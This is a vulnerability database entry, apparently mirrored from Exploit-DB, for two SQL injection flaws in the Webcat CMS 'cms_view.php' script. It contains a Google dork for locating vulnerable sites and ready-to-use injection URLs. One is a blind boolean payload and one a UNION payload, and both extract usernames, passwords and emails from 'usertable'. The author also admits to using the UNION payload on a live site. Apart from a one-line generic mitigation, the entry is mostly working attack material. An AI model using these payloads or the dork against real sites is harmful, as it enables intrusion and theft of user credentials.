Webcat - Two Blind SQL Injection Vulnerabilities

vendor:

Webcat

by:

w0rd

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Webcat

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/Windows 7

2011

Webcat – Two Blind SQL Injection Vulnerabilities

Two Blind SQL Injection vulnerabilities exist in Webcat. The first vulnerability is present in the 'web_id' parameter and the second vulnerability is present in the 'id' parameter. An attacker can exploit these vulnerabilities by sending malicious SQL queries to the vulnerable parameters. For example, sending a malicious SQL query to the 'web_id' parameter as 'http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021' and 'http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021 and ascii(substring((SELECT concat(user_name,0x3a,user_password,0x3a,email,0x0a) FROM usertable limit 0,1),1,1))>80' can allow an attacker to extract sensitive information from the database. Additionally, an attacker can also exploit the 'id' parameter by sending a malicious SQL query as 'http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&id=50' and 'https://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(email,0x3a,user_password,0x0a),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 from usertable--' to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

# Exploit Title: Webcat - Two Blind SQL Injection Vulnerabilities
# Google Dork: allinurl: sc_webcat/ecat/cms_view.php
# Date: 6/23/2011
# Author: w0rd (w0rd[at]NULL0x00.com)
# Software Link: http://webcat.sourceforge.net/
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters: web_id=, id=
##############################################################
PoC:

http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&id=50'
http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021'
http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021 and ascii(substring((SELECT concat(user_name,0x3a,user_password,0x3a,email,0x0a) FROM usertable limit 0,1),1,1))>80

I have come across one site where it was not blind, and used this:
https://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(email,0x3a,user_password,0x0a),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 from usertable--

##############################################################
# Shouts to the Belegit crew